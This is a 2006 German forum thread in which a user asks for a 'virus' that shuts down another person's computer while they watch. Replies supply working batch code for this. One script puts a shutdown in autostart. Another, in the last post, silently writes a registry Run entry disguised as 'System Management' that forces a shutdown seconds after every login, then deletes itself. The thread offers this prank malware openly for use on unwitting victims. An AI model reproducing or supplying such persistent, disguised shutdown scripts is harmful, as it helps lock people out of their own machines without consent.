cmd

Dieses Thema im Forum "Programmierung & Entwicklung" wurde erstellt von [mac]snails, 28. März 2006 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 28. März 2006
    Hallo zusammen ich hab ne frage:


    ich weiss dass man im cmd shutdown -s -t 100 z.b eingeben kann dass der pc runter fährt
    wie bekomme ich aber die maus dazu darauf zu klicken, ohne sie zu steuern?

    ich will was programieren, damit die maus, ohne gestäuert zu werden, auf den ausführen, cmd, shutdown geht, indem man ne datei, nen sogenannten virus öffnet

    wie mach ich das?

    bei help is n 10ner sicher und ich wäre echt froh wenn mir jemand helfen könnte
     

  2. Anzeige
  3. #2 28. März 2006
    Hi,
    also so wie du das beschrieben hast, würde das höchstens mit nem Macro programm gehen, das die maus an irgendeine position am bildschirm bewegt (AutoIt, EzMacro, und wie sie alle heisen).
    Das müsste allerdings wieder gestartet werden (mit batch file eh kein problem), allerdings is das ganze auflösungsspezifisch, und die box müsste immer an selber stelle sein.
    Also so einfach geht das net mit maus rüberfahren und klicken ;)

    mfg
     
  4. #3 28. März 2006
    ein system("shutdown -s now") in einem Programm dürfte doch reichen ..
     
  5. #4 28. März 2006
    aber ist doch netter, wenn der betreffende sieht was passiert und nichts tun kann

    und ausserdem weiss ich ebenfalls nicht wie ich das mache
    mit dem editor glaube ich
     
  6. #5 28. März 2006
    bei "shutdown -s now" wird gleich heruntergefahren und man kann nix machen

    der Befehl von XodoX is übrigens in C++, da hilft dir der Editor nur was, wenn dun compiler hast oO
     
  7. #6 28. März 2006
    ich würde dir auch zu dem genannten raten.
    Deine Idee ist zwar in einem Programm machbar, aber nicht etwas für jemanden der nicht programmiert...

    Den Mauscursor programmgesteuert auf den Weg zu bringen ist kein Ding, aber dann musst du dich auch noch (wie erwähnt) mit der Auflösung auseinander setzen und zudem verhindern, dass der Benutzer mittels Maus oder Tastatur in das Geschehen eingreifen kann usw.
     
  8. #7 28. März 2006
    AutoIt arbeitet ned nach Auflösung....sondern nach den Controls vom Programm...Man sagt dem Prog einfach wie der Button heißt der gedrückt werden soll

    Wie wärs mit ner Tastenkombi? dann musste maus ned bewegen.

    mfg r90
     
  9. #8 28. März 2006
    hab mit autoit noch net so viel gemacht. Interessiert mich eher weniger. Hab bis jetzt nur solche sachen gemacht mit movemouse oder wie das ganze heist ;)
    aber gut zu wissen
     
  10. #9 29. März 2006
    gibts nicht ne variante mit dem editor?
     
  11. #10 29. März 2006
    start => ausführen => cmd => shutdown -s -f -t 0

    des müsste den rechner direkt runterfahren, einfach in ne bat hauen und ausführen, ka obs geht, will nich testen ^^
     
  12. #11 29. März 2006
    moment wie war das doch gleich...

    gabs schonmal hier im board...

    ah ich habs...

    ne .bat erstellen,mit folgenden Inhalt
    Code:
    shutdown -s -t 66 -c "Haha"
    exit
    und die mußte irgendwie dazu bringen das sie ausführt wird
    z.B. in den Autostart

    habse mal zum testen in den Anhang gelegt ;)
     
  13. #12 29. März 2006
    wie erstelle ich eine bat datei?
    einfach den dateinamen irgendwas.bat nennen und das wars dann?
     
  14. #13 30. März 2006
    einfach ne textdatei erstellen z.B. shutdown.txt
    dort die commands eintragen
    speichern
    und die dann umbenennen in shutdown.bat
     
  15. #14 30. März 2006
    Aber wenn du ne bat in den Autostart machst.. geht das glaube net.... musst die bat erst in ne .exe umwandeln, dann müsste es mit dem Autostart gehen !!!
     
  16. #15 30. März 2006
    das kann gut sein, denn die datei vom huntgath fährt den pc bei mir net runter, es erscheint nur in der eingabeaufforderung, die dann durchdreht:)
    naja
    andere vorschläge?
     
  17. #16 30. März 2006
    Nope...

    ich sag nur "regedit" ^^ Such mal in H & S.

    #-----

    Ich hab hier mal ein Video gedreht. Liegt im Anhang bei. ( Ist ca. 2 MB gross, aber gepackt sehr sehr klein ^^ )

    Das Video zeigt, wie man eine Bat erstellt, die den PC herunterfährt und wie man es schafft, den shutdown abzubrechen per Cmd ...

    Mfg,

    Kolazomai
     
  18. #17 30. März 2006
    genial
    thx
    das hat wirklich ne 10 verdient
    das ist genial
    so was lobe ich mir
    jeder sollte so energishc hilfe anbieten, nicht nur immer spammen
     
  19. #18 9. April 2006
    des wussten wir doch schon :D *g*
    und wie bekommt man des in AUtostart rein? :))
     
  20. #19 9. April 2006
    Hoi,

    Code:
    @echo off
    echo Windows Registry Editor Version 5.00 >> temp.reg
    echo. >> temp.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
    echo "System Management"="shutdown -f -t 5 -c \"du nervst\"" >> temp.reg
    regedit /s temp.reg
    del temp.reg
    del deine.bat
    Nachzulesen hier!

    Mfg,

    Kolazomai
     

  21. Videos zum Thema
Die Seite wird geladen...